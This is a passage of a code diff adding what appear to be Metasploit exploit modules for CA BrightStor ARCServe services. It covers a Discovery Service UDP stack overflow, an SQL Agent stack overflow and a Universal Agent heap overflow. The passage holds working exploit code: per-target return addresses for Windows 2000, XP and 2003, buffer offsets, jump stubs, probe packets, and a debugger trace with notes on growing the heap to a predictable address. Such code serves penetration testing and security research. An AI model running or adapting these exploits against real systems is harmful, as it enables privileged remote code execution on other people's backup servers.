This module exploits a vulnerability in the CA BrightStor
Discovery Service. This vulnerability occurs when a large
request is sent to UDP port 41524, triggering a stack
overflow.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '13613'],
[ 'BID', '12491'],
[ 'CVE', '2005-0260'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
[ 'MIL', '14'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'cheyprod.dll 12/12/2003',
{
'Platform' => 'win',
'Ret' => 0x23808eb0, # call to edi reg
},
],
],
'DisclosureDate' => 'Dec 20 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(41524)
], self)
end
def check
# The first request should have no reply
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => 41523,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('META')
x = csock.get_once(-1, 3)
csock.close
# The second request should be replied with the host name
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => 41523,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('hMETA')
y = csock.get_once(-1, 3)
csock.close
if (y and not x)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect_udp
buf = 'X' * 4096
# esp @ 971
# ret @ 968
# edi @ 1046
# end = 4092
buf[968, 4] = [ target.ret ].pack('V')
buf[1046, payload.encoded.length] = payload.encoded
udp_sock.put(buf)
udp_sock.recvfrom()
handler
disconnect_udp
end
end
end

100
modules/exploits/windows/brightstor/brightstor_sqlagent.rb Normal file
View File

@ -0,0 +1,100 @@
require 'msf/core'
module Msf
class Exploits::Windows::Brightstor::BrightstorSQLAgentOverflow < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Agent for Microsoft SQL Server. This vulnerability was
discovered by cybertronic[at]gmx.net.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-1272'],
[ 'BID', '14453'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],
[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],
[ 'MIL', '83'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# This exploit requires a jmp esp for return
['ARCServe 11.0 Asbrdcst.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp
['ARCServe 11.1 Asbrdcst.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret
['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret
# Generic jmp esp's
['Windows 2000 SP0-SP3 English', { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp
['Windows 2000 SP4 English', { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp
['Windows XP SP0-SP1 English', { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret
['Windows XP SP2 English', { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret
['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret
['Windows 2003 SP1 English', { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret
],
'DisclosureDate' => 'Aug 02 2005',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6070)
], self)
end
def exploit
# The 'one line' request does not work against Windows 2003
1.to(5) { |i|
# Flush some memory
connect
begin
sock.put("\xff" * 0x12000)
sock.get_once
rescue
end
disconnect
# 3288 bytes max
# 696 == good data (1228 bytes contiguous) @ 0293f5e0
# 3168 == return address
# 3172 == esp @ 0293ff8c (2476 from good data)
buf = Rex::Text.rand_text_english(3288, payload_badchars)
buf[ 696, payload.encoded.length ] = payload.encoded
buf[3168, 4] = [target.ret].pack('V') # jmp esp
buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476
connect
begin
sock.put(buf)
sock.get_once
rescue
end
handler
disconnect
}
end
end
end

162
modules/exploits/windows/brightstor/brightstor_uniagent.rb Normal file
View File

@ -0,0 +1,162 @@
require 'msf/core'
module Msf
class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Universal Agent Overflow',
'Description' => %q{
This module exploits a convoluted heap overflow in the CA
BrightStor Universal Agent service. Triple userland
exception results in heap growth and execution of
dereferenced function pointer at a specified address.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'MIL', '16'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
],
'Privileged' => true,
'Payload' =>
{
# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
'Space' => 164,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Magic Heap Target #1',
{
'Platform' => 'win',
'Ret' => 0x01625c44, # We grow to our own return address
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6050)
], self)
end
def check
connect
probe = "\x00\x00\x00\x00\x03\x20\xbc\x02" +
("2" * 256) +
("A" * 32) +
"\x0B\x11\x0B\x0F\x03\x0E\x09\x0B" +
"\x16\x11\x14\x10\x11\x04\x03\x1C" +
"\x11\x1C\x15\x01\x00\x06" +
("X" * 390)
sock.put(probe)
resp = sock.get_once
disconnect
if (resp and resp == "\x00\x00\x73\x02\x32\x32\x00\x00")
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
# The server reverses four bytes starting at offset 0xa5 :0
# Create the overflow string
boom = 'X' * 1024
# Required field to trigger the fault
boom[248, 2] = [1000].pack('V')
# The shellcode, limited to 250 bytes (no nulls)
boom[256, payload.encoded.length] = payload.encoded
# This should point to itself
boom[576, 4] = [target.ret].pack('V')
# This points to the code below
boom[580, 4] = [target.ret + 8].pack('V')
# We have 95 bytes, use it to hop back to shellcode
boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"
# Stick the protocol header in front of our request
req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom
# We keep making new connections and triggering the fault until
# the heap is grown to encompass our known return address. Once
# this address has been allocated and filled, each subsequent
# request will result in our shellcode being executed.
1.upto(200) {|i|
connect
print_status("Sending request #{i} of 200...") if (i % 10) == 0
sock.put(req)
disconnect
# Give the process time to recover from each exception
select(nil, nil, nil, 0.1);
}
handler
end
end
end
__END__
012a0d91 8b8e445c0000 mov ecx,[esi+0x5c44]
012a0d97 83c404 add esp,0x4
012a0d9a 85c9 test ecx,ecx
012a0d9c 7407 jz ntagent+0x20da5 (012a0da5)
012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=???????
012a0da0 6a01 push 0x1
012a0da2 ff5204 call dword ptr [edx+0x4]
Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.
If these addresses do not match up, run this exploit, then attach with WinDbg:
> s 0 Lfffffff 0x44 0x5c 0x61 0x01
Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1
011b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01205c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
[ snip ]
01605c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01615c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01625c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01635c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01645c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01655c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01665c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01675c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01685c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01695c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01725c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........